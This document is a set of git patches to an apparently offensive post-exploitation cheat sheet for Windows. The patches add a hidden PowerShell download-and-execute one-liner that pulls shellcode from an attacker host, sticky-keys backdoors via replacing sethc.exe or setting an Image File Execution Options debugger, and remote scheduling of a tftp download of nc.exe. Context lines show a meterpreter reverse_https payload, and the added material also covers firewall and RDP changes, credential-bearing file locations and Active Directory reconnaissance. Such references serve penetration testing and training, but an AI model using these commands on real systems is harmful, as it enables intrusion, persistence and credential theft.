From b55aa3884199fe2048f2fdc1f44c49c54606971f Mon Sep 17 00:00:00 2001 From: webbreacher Date: Thu, 23 Jan 2014 17:20:18 -0500 Subject: [PATCH 1/7] Adding files I forgot to add yesterday --- presence/windows/blind.md | 2 +- presence/windows/windows_cmd_config.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/presence/windows/blind.md b/presence/windows/blind.md index 8a67efd..e294932 100644 --- a/presence/windows/blind.md +++ b/presence/windows/blind.md @@ -26,4 +26,4 @@ The files below are things to pull when all you can do is to blindly read. Examp | `%WINDIR%\system32\config\default.sav`
`%WINDIR%\system32\config\security.sav`
`%WINDIR%\system32\config\software.sav`
`%WINDIR%\system32\config\system.sav` | Backup Windows registry files (http://forensics.wikia.com/wiki/Windows_registry_entries) | | `%WINDIR%\system32\logfiles\httperr\httperr1.log` | IIS 6.x web server error logs. | | `%WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log` where YYMMDD = year month day | Web server log files. | -| `unattend.txt, unattend.xml, sysprep.inf` | Used in the automated deployment of Windows images and can contain user accounts. | \ No newline at end of file +| `unattend.txt, unattend.xml, unattended.xml, sysprep.inf` | Used in the automated deployment of Windows images and can contain user accounts. Sometimes found in the `%WINDIR%\Panther\` directory. | \ No newline at end of file diff --git a/presence/windows/windows_cmd_config.md b/presence/windows/windows_cmd_config.md index aa4eae6..15b4ef7 100644 --- a/presence/windows/windows_cmd_config.md +++ b/presence/windows/windows_cmd_config.md @@ -214,7 +214,7 @@ For some of these `wmic` commands that pull information (versus perform an actio ### Process Create * **Command with arguments**: `wmic process call create [EXECUTABLE]` - * **Description**: Launches an executable. Replace [EXECUTABLE] with the name of the executable you'd like to launch (for example: calc.exe). Do not include quotes around the value (for example: *DO* use calc.exe; do *NOT* use "calc.exe"). + * **Description**: Launches an executable. Replace [EXECUTABLE] with the name of the executable you'd like to launch (for example: calc.exe). Do not include quotes around the value (for example: *DO* use calc.exe; do *NOT* use "calc.exe"). Another option for this command comes from [Rob Fuller's talk](http://www.slideshare.net/mubix/windows-attacks-at-is-the-new-black-26665607): `wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c vssadmin list shadows 2>&1 > c:\temp\output.txt"` * **Output**: *
**Windows 2008:** Show/Hide
C:\Users\johndoe>wmic process call create calc.exe
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 1936;
ReturnValue = 0;
};
From a9d2c2a198bf3445896197ff5c1c5caa9861fd87 Mon Sep 17 00:00:00 2001 From: webbreacher Date: Thu, 23 Jan 2014 19:43:51 -0500 Subject: [PATCH 2/7] Made it up to slide 49 --- persistence/windows/general.md | 39 +++++++++++++++++++++++++++------- 1 file changed, 31 insertions(+), 8 deletions(-) diff --git a/persistence/windows/general.md b/persistence/windows/general.md index 651fbfd..c337744 100644 --- a/persistence/windows/general.md +++ b/persistence/windows/general.md @@ -13,19 +13,26 @@ return false; Commands to run to maintain persistence after you have exploited it and are usually executed from the context of the `cmd.exe` or `command.exe` prompt. +### Firewall Exceptions +When you modify a system to talk on the network, you may need to alter the Windows firewall so your traffic is not filtered. The `netsh` command can be used to do this as the command to enable Remote Desktop Protocol below shows: + +`netsh firewall set service type = remotedesktop mode = enable` + + +### Powershell Downloader + * **Command with arguments**: `powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://[domainname|IP]:[port]/[file]'))"` + * **Description**: According to [posted slides](http://www.slideshare.net/mubix/windows-attacks-at-is-the-new-black-26665607), _"Schedule this and it will execute the shellcode on that page, pulling it each time (so you can change as needed)"_. + + ### Remote Assistance Enable * **Command with arguments**: `reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f` * **Description**: **Must be admin to run this.** Enable remote assistance through adding a registry entry on the local system. - * **Output**: - *
**Windows 2008:** Show/Hide
C:\Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f -The operation completed successfully.
+ ### Remote Desktop Enable - Method 1 * **Command with arguments**: `reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f` - * **Description**: **Must be admin to run this.** Enable remote desktop through adding a registry entry on the local system. - * **Output**: - *
**Windows 2008:** Show/Hide
C:\Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f -The operation completed successfully.
+ * **Description**: **Must be admin to run this.** Enable remote desktop through adding a registry entry on the local system. + ### Remote Desktop Enable - Method 2 Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 53)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely enable remote desktop using the commands below. @@ -76,4 +83,20 @@ c:\> net use \\[TargetIP]\ipc$ password /user:username c:\> at \\[TargetIP] 12:00 pm command -An example you might run on the remote system might be: `at \\192.168.1.1 12:00pm tftp -I [MyIP] GET nc.exe` \ No newline at end of file +An example you might run on the remote system might be: `at \\192.168.1.1 12:00pm tftp -I [MyIP] GET nc.exe` + + +### Sticky Keys (Requires reboot) +Sticky keys on Windows systems are activated when the user presses the SHIFT key 5 times. Here, according to the [posted slides](http://www.slideshare.net/mubix/windows-attacks-at-is-the-new-black-26665607), you replace the sethc.exe binary with your own binary (cmd.exe maybe?) and, when SHIFT is pressed 5 times, your binary is executed. Your binary will execute as SYSTEM and needs to replace the `%WINDIR%\System32\sethc.exe`. + +Some caveats: +* If NLA (Network Layer Authentication) is enabled, this won't work +* If RDP (Remote Desktop Protocol) is disabled, this won't work + + +### Sticky Keys (No reboot) +This technique uses registry entries to switch the binary that the sticky keys executes. Its real advantage is that it does not require a reboot for the switch to take place. +* In the `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options` make a key called `sethc.exe` +* Make a REG_SZ value called "Debugger" (Ensure it is capitalized) +* For the "Debugger" REG_SZ, make it have a value of your binary +* Press SHIFT 5 times and your binary should be executed \ No newline at end of file From 103efe7d271cd09d6a9e598e979a2a1539194968 Mon Sep 17 00:00:00 2001 From: jakxx Date: Fri, 24 Jan 2014 11:54:27 -0500 Subject: [PATCH 3/7] Add Powershell Active Directory Commands --- scripting/powershell.md | 24 ++++++++++++++++++++++-- 1 file changed, 22 insertions(+), 2 deletions(-) diff --git a/scripting/powershell.md b/scripting/powershell.md index fdcadbd..9fb2720 100644 --- a/scripting/powershell.md +++ b/scripting/powershell.md @@ -25,7 +25,7 @@ iex (New-Object Net.WebClient).DownloadString("http://host/file.txt") (new-object System.Net.WebClient).Downloadfile('http://host/file.exe', 'file.exe') ``` -**Enumerate Allowed Outbound Ports 1-1024** +**Enumerate Allowed Outbound Ports 1-1024 via [securitypadawan.blogspot.com](http://securitypadawan.blogspot.com/2013/04/quickly-determine-allowed-outbound-ports.html)** ``` $ErrorActionPreference = "silentlycontinue"; 1..1024 | % {$req = [System.Net.WebRequest]::Create("http://letmeoutofyour.net:$_"); $req.Timeout = 600; $resp = $req.GetResponse(); $respstream = $resp.GetResponseStream(); @@ -63,4 +63,24 @@ Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10 ### Translate SID to Username * **Command with arguments**: `((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-19")).translate([System.Security.Principal.NTAccount])).value` * **Output**: - *
**Windows 7:** Show/Hide
PS C:\Users\johndoe> ((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-1319606305-3131390644-2280705280-
1000")).translate([System.Security.Principal.NTAccount])).value
WIN-244VDGE5OGH\johndoe
\ No newline at end of file + *
**Windows 7:** Show/Hide
PS C:\Users\johndoe> ((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-1319606305-3131390644-2280705280-
1000")).translate([System.Security.Principal.NTAccount])).value
WIN-244VDGE5OGH\johndoe
+ + ## Using the PowerShell Active Directory Modules via (https://www.trustedsec.com/uncategorized/powershell-reconnaissance/) + ### Setting Credentials + * **Command with arguments**: `$cred = Get-Credential` + * **Notes**: These following commands require the Powershell Active Directory Modules to be installed. These can be downloaded for Win7 [here] (http://www.microsoft.com/en-us/download/details.aspx?id=7887) + * **Output**: + *
**Windows 7:** Show/Hide
PS C:\Users\johndoe> ((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-1319606305-3131390644-2280705280-
1000")).translate([System.Security.Principal.NTAccount])).value
WIN-244VDGE5OGH\johndoe
+ + ### Query to List "Domain Admins" + * **Command with arguments**: `Get-ADGroupMember -Credential $cred -server pwnt.com "Domain Admins"` + * **Output**: + *
**Windows 7:** Show/Hide

distinguishedName : CN=Administrator,CN=Users,DC=pwnt,DC=com
name : Administrator
objectClass : user
objectGUID : 1fd60ff8-07a4-4c6e-9a1e-7cd0d7bb97db
SamAccountName : Administrator
SID : S-1-5-21-2027135834-1792351174-2509185371-500
+ + ### Enumerate All Servers on Domain" + * **Command with arguments**: `Get-ADComputer -Credential $cred -server pwnt.com -LDAPFilter "(&(objectCategory=computer)(opera +tingSystem=*Server*))" |select name` + * **Output**: + *
**Windows 7:** Show/Hide

name
----
PWNT-DC
+Exchange1
+SharePoint1
\ No newline at end of file From c0549ecd54192455c80d582a358c040c9ae2d407 Mon Sep 17 00:00:00 2001 From: jakxx Date: Fri, 24 Jan 2014 11:57:08 -0500 Subject: [PATCH 4/7] minor edits --- scripting/powershell.md | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/scripting/powershell.md b/scripting/powershell.md index 9fb2720..a8248bc 100644 --- a/scripting/powershell.md +++ b/scripting/powershell.md @@ -65,22 +65,21 @@ Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10 * **Output**: *
**Windows 7:** Show/Hide
PS C:\Users\johndoe> ((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-1319606305-3131390644-2280705280-
1000")).translate([System.Security.Principal.NTAccount])).value
WIN-244VDGE5OGH\johndoe
- ## Using the PowerShell Active Directory Modules via (https://www.trustedsec.com/uncategorized/powershell-reconnaissance/) + ## Using the PowerShell Active Directory Modules + ### Via https://www.trustedsec.com/uncategorized/powershell-reconnaissance/ ### Setting Credentials * **Command with arguments**: `$cred = Get-Credential` - * **Notes**: These following commands require the Powershell Active Directory Modules to be installed. These can be downloaded for Win7 [here] (http://www.microsoft.com/en-us/download/details.aspx?id=7887) - * **Output**: - *
**Windows 7:** Show/Hide
PS C:\Users\johndoe> ((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-1319606305-3131390644-2280705280-
1000")).translate([System.Security.Principal.NTAccount])).value
WIN-244VDGE5OGH\johndoe
+ * **Notes**: These following commands require the Powershell Active Directory Modules to be installed. These can be downloaded for Win7 [here] (http://www.microsoft.com/en-us/download/details.aspx?id=7887) ### Query to List "Domain Admins" * **Command with arguments**: `Get-ADGroupMember -Credential $cred -server pwnt.com "Domain Admins"` * **Output**: - *
**Windows 7:** Show/Hide

distinguishedName : CN=Administrator,CN=Users,DC=pwnt,DC=com
name : Administrator
objectClass : user
objectGUID : 1fd60ff8-07a4-4c6e-9a1e-7cd0d7bb97db
SamAccountName : Administrator
SID : S-1-5-21-2027135834-1792351174-2509185371-500
+ *
**Windows 7:** Show/Hide
distinguishedName : CN=Administrator,CN=Users,DC=pwnt,DC=com
name : Administrator
objectClass : user
objectGUID : 1fd60ff8-07a4-4c6e-9a1e-7cd0d7bb97db
SamAccountName : Administrator
SID : S-1-5-21-2027135834-1792351174-2509185371-500
### Enumerate All Servers on Domain" * **Command with arguments**: `Get-ADComputer -Credential $cred -server pwnt.com -LDAPFilter "(&(objectCategory=computer)(opera tingSystem=*Server*))" |select name` * **Output**: - *
**Windows 7:** Show/Hide

name
----
PWNT-DC
+ *
**Windows 7:** Show/Hide
name
----
PWNT-DC
Exchange1
SharePoint1
\ No newline at end of file From 8d3fa87e123b513bccfecd8d53312c6d25f00d34 Mon Sep 17 00:00:00 2001 From: jakxx Date: Fri, 24 Jan 2014 11:57:30 -0500 Subject: [PATCH 5/7] Minor edits --- scripting/powershell.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scripting/powershell.md b/scripting/powershell.md index a8248bc..6b70e7f 100644 --- a/scripting/powershell.md +++ b/scripting/powershell.md @@ -76,7 +76,7 @@ Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10 * **Output**: *
**Windows 7:** Show/Hide
distinguishedName : CN=Administrator,CN=Users,DC=pwnt,DC=com
name : Administrator
objectClass : user
objectGUID : 1fd60ff8-07a4-4c6e-9a1e-7cd0d7bb97db
SamAccountName : Administrator
SID : S-1-5-21-2027135834-1792351174-2509185371-500
- ### Enumerate All Servers on Domain" + ### Enumerate All Servers on Domain * **Command with arguments**: `Get-ADComputer -Credential $cred -server pwnt.com -LDAPFilter "(&(objectCategory=computer)(opera tingSystem=*Server*))" |select name` * **Output**: From cccac5fc4588a8537b6d2ed776b757fba345cab9 Mon Sep 17 00:00:00 2001 From: jakxx Date: Fri, 24 Jan 2014 16:46:39 -0500 Subject: [PATCH 6/7] Updated install link --- scripting/powershell.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scripting/powershell.md b/scripting/powershell.md index 6b70e7f..0957e99 100644 --- a/scripting/powershell.md +++ b/scripting/powershell.md @@ -69,7 +69,7 @@ Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10 ### Via https://www.trustedsec.com/uncategorized/powershell-reconnaissance/ ### Setting Credentials * **Command with arguments**: `$cred = Get-Credential` - * **Notes**: These following commands require the Powershell Active Directory Modules to be installed. These can be downloaded for Win7 [here] (http://www.microsoft.com/en-us/download/details.aspx?id=7887) + * **Notes**: These following commands require the Powershell Active Directory Modules to be installed. Steps to install for Win7 are detailed [here] (http://blogs.msdn.com/b/rkramesh/archive/2012/01/17/how-to-add-active-directory-module-in-powershell-in-windows-7.aspx) ### Query to List "Domain Admins" * **Command with arguments**: `Get-ADGroupMember -Credential $cred -server pwnt.com "Domain Admins"` From 17cf5397f2c911081084d98d372d2091172e4d67 Mon Sep 17 00:00:00 2001 From: jakxx Date: Fri, 24 Jan 2014 16:48:11 -0500 Subject: [PATCH 7/7] Update description --- scripting/powershell.md | 1 + 1 file changed, 1 insertion(+) diff --git a/scripting/powershell.md b/scripting/powershell.md index 0957e99..94bb7a7 100644 --- a/scripting/powershell.md +++ b/scripting/powershell.md @@ -69,6 +69,7 @@ Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10 ### Via https://www.trustedsec.com/uncategorized/powershell-reconnaissance/ ### Setting Credentials * **Command with arguments**: `$cred = Get-Credential` + * **Description**: Stores valid credentials in the $cred variable for use with the Active Directory Modules. * **Notes**: These following commands require the Powershell Active Directory Modules to be installed. Steps to install for Win7 are detailed [here] (http://blogs.msdn.com/b/rkramesh/archive/2012/01/17/how-to-add-active-directory-module-in-powershell-in-windows-7.aspx) ### Query to List "Domain Admins"